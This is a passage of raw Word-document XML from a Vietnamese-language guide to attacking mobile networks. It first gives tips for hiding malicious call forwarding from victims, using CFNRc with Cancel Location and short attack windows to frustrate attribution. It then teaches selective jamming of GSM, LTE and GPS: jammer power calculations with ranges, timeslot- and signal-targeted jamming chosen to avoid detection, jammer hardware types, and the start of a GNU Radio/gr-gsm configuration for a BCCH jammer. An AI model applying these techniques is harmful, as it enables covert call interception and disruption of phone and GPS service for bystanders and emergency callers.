        <w:t xml:space="preserve">7.5 Phát Hiện và Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phát hiện từ phía nạn nhân:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Không nhận được cuộc gọi mặc dù có sóng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- SMS nhận được nhưng cuộc gọi không rung</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Kiểm tra menu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dịch vụ bổ sung</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trong thiết lập điện thoại → thấy CFU được bật</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kỹ thuật bypass phát hiện:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Dùng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CFNRc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thay vì CFU: chỉ kích hoạt khi kết hợp với Cancel Location → khó phát hiện hơn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Giới hạn thời gian tấn công (active trong 30 phút, sau đó deregister) → khó attribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="74" w:name="selective-jamming"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Selective Jamming</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="70" w:name="lý-thuyết-nhiễu-vô-tuyến"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Lý Thuyết Nhiễu Vô Tuyến</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mô hình kênh với nhiễu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SINR = Psignal / (Pnoise + Pjamming)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Với:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Psignal = Pt_base × (λ/4πd)² × Gt × Gr  [Friis equation]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Pjamming = Pt_jammer × (λ/4πdj)² × Gj × Gr</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Để gây mất kết nối:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  SINR &lt; SINR_min (phụ thuộc modulation: QPSK ~3dB, 64QAM ~20dB)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → Pt_jammer &gt; Psignal × (dj/d)² × Gj/Gt / SINR_min</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ tính toán thực tế:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản: Jam LTE Band 3 tại điểm cách trạm thật 500m, jammer cách mục tiêu 10m</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Psignal tại mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Pt_base = 43 dBm (20W macro cell)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Path loss 500m @ 1800 MHz: L = 20×log(4π×500/0.167) ≈ 81 dB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Psignal ≈ 43 - 81 = -38 dBm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Pjamming cần thiết:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  SINR_min (LTE QPSK 1/3) ≈ -6 dB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Pjamming &gt; Psignal - SINR_min = -38 - (-6) = -32 dBm tại antenna mục tiêu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Path loss jammer→target 10m @ 1800 MHz: ≈ 47 dB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Pt_jammer cần &gt; -32 + 47 = +15 dBm ≈ 30 mW</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Jammer 30–100 mW đủ để gây nhiễu trong bán kính 10m</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Jammer 1–10 W đủ để gây nhiễu trong bán kính 50–200m</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="71" w:name="protocol-aware-jamming"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Protocol-Aware Jamming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thay vì jam liên tục (dễ bị phát hiện và tốn năng lượng), tấn công thông minh hơn nhắm vào các ký hiệu/slot quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GSM – Jam BCCH (Broadcast Control Channel):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM Frame Structure (4.615ms TDMA frame, 8 timeslots):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TS0: BCCH + CCCH (control)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TS1-7: TCH (voice/data) hoặc SDCCH</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Jam TS0 trên ARFCN của BCCH:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → UE không đọc được MCC/MNC/LAC/cell parameters</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → UE không thể camp on cell → "No service"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Tần số jam: Chỉ 1 ARFCN (200 kHz bandwidth)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Duty cycle: ~12.5% (chỉ TS0 trong mỗi frame)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Tiết kiệm năng lượng, khó phát hiện hơn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LTE – Jam PSS/SSS (Synchronization Signals):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LTE Frame (10ms): Subframe 0 và 5 chứa PSS/SSS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PSS: Primary Synchronization Signal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SSS: Secondary Synchronization Signal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Jam chỉ PSS/SSS trong subframe 0 và 5:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → UE không đồng bộ được cell → không decode SIB → "No service"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Duty cycle: 2/10 = 20%</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bandwidth cần jam: Chỉ 6 center PRBs (1.08 MHz) trong những symbol đó</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Rất hiệu quả, tiêu thụ ít RF power</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GPS Jamming:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GPS L1: 1575.42 MHz (C/A code, civilian)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Rx power tại thiết bị: ~ -130 dBm (rất yếu)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Chỉ cần jammer công suất 1 mW để jam GPS trong bán kính vài trăm mét</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Nhiều thiết bị bay không người lái sử dụng kỹ thuật này để bảo vệ vùng cấm bay</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkStart w:id="72" w:name="phân-loại-thiết-bị-jamming"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 Phân Loại Thiết Bị Jamming</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Loại 1: Narrowband CW Jammer (đơn giản nhất)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VCO (Voltage Controlled Oscillator) → RF Amplifier → Antenna</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Chỉ jam một tần số cố định</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Không có tính chọn lọc giao thức</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── Rất dễ phát hiện bằng spectrum analyzer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Loại 2: Swept Frequency Jammer (barrage jammer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Sweeping VCO → PA → Antenna</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Quét qua dải tần (vd: 900 MHz – 2.1 GHz)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Jam tất cả GSM/3G/4G/5G trong dải</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── Dễ phát hiện, ảnh hưởng rộng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Loại 3: SDR-based Protocol-Aware Jammer (tinh vi nhất)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GNU Radio Flowgraph:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ┌─────────────┐    ┌──────────────┐    ┌──────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │  LTE frame  │    │  Targeted    │    │  USRP TX     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │  analyzer   │───►│  jamming     │───►│  (Software   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │  (RX path)  │    │  signal gen  │    │   Defined)   │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └─────────────┘    └──────────────┘    └──────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Luồng:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  1. RX path decode SIB để biết cell parameters</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  2. Tính thời điểm PSS/SSS xuất hiện (từ frame timing)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  3. TX path phát jamming signal đúng vào những slot đó</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Kết quả: Jam cực kỳ hiệu quả với duty cycle thấp → khó phát hiện</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkStart w:id="73" w:name="gnu-radio-implementation-sdr-jammer"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.4 GNU Radio Implementation (SDR Jammer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GNU Radio Companion flowgraph (mô tả, không phải code thực thi trực tiếp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Selective GSM BCCH Jammer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Các block GNU Radio cần:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. UHD Source (RX) - lắng nghe để tìm GSM frame timing</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. GSM Receiver (gr-gsm) - decode BCCH để lấy frame number</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. Burst Gate - chỉ cho phép TX trong timeslot 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. GMSK Modulator - tạo tín hiệu nhiễu dạng GSM hợp lệ (deceptive jamming)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 5. UHD Sink (TX) - phát tín hiệu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># gr-gsm (GNU Radio GSM) cung cấp:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - Receiver Hier Block: decode GSM downlink</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - BCCH Demapper: extract broadcast info</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - Burst Timeslot Filter: chọn lọc timeslot</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Flowgraph YAML (GRC format - rút gọn):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">blocks:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  - id: uhd_usrp_source</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    parameters:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      freq: 935.2e6    # GSM900 BCCH ARFCN 60 DL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      samp_rate: 2e6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  - id: gsm_receiver</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    parameters:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      fc: 935.2e6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      osr: 4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  - id: gsm_bcch_ccch_demapper</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    connections: [gsm_receiver]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
